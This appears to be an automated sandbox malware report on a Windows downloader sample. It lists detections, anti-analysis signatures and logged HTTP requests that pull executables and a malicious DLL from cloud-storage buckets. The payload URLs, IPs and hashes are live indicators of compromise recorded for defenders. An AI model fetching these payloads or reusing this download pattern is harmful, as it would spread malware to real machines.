Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_246.exe

Overview

General Information

Sample name:LisectAVT_2403002B_246.exe
Analysis ID:1481908
MD5:8b5eb95f4a065ebf2719fe29321ca7ff
SHA1:7eca9aca802512fe345f55bb5aa969f384f3e934
SHA256:3754d6f495a00c1b11dc4da5a975d3876303071f3238307e4225e0ce392c02c5
Tags:exe
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LisectAVT_2403002B_246.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_246.exe" MD5: 8B5EB95F4A065EBF2719FE29321CA7FF)
    • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched
Timestamp:2024-07-25T16:04:45.684505+0200
SID:2022930
Source Port:443
Destination Port:49737
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T16:04:34.377932+0200
SID:2011803
Source Port:443
Destination Port:49733
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-07-25T16:05:24.036708+0200
SID:2022930
Source Port:443
Destination Port:49751
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LisectAVT_2403002B_246.exeAvira: detected
Source: C:\Program Files (x86)\Everything\app_core_legacy.dllAvira: detection malicious, Label: TR/Redcap.jxchs
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dllAvira: detection malicious, Label: TR/Redcap.jxchs
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Everything\app_core_legacy.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dllJoe Sandbox ML: detected
Source: LisectAVT_2403002B_246.exeJoe Sandbox ML: detected
Source: LisectAVT_2403002B_246.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.75.57.36:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: LisectAVT_2403002B_246.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wabmig.pdbGCTL source: LisectAVT_2403002B_246.exe
Source: Binary string: wabmig.pdb source: LisectAVT_2403002B_246.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: C:\Users\Administrator\source\repos\MSASN1\Release\MSASN1.pdb source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.000000000064C000.00000004.00000020.00020000.00000000.sdmp, app_core_legacy.dll.0.dr, MSASN1[1].dll.0.dr
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EEDEE2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EEDEE2
Source: Joe Sandbox ViewIP Address: 159.75.57.36 159.75.57.36
Source: Joe Sandbox ViewIP Address: 43.153.232.151 43.153.232.151
Source: Joe Sandbox ViewIP Address: 43.152.64.207 43.152.64.207
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /PluginLauncher.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /MSASN1.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00ED3150 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,0_2_00ED3150
Source: global trafficHTTP traffic detected: GET /PluginLauncher.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /MSASN1.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: loaderHost: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: www80-1323570959.cos.ap-singapore.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://ocsp.digicert.com0H
Source: LisectAVT_2403002B_246.exeString found in binary or memory: http://ocsp.digicert.com0I
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://ocsp.digicert.com0L
Source: PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/A
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllH
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllQ
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllh
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllle
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllls
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/g
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/p
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.a
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.aF
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/L
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe0
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exeha
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlles
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllj
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll3
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/s
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/y
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/yh
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/z
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/4
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/R
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/g
Source: LisectAVT_2403002B_246.exeString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin%6
Source: LisectAVT_2403002B_246.exeString found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binloaderaHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1O
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.75.57.36:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EF21B90_2_00EF21B9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EEC3E90_2_00EEC3E9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EEBBE70_2_00EEBBE7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exeCode function: 0_2_00EDFC340_2_00EDFC34
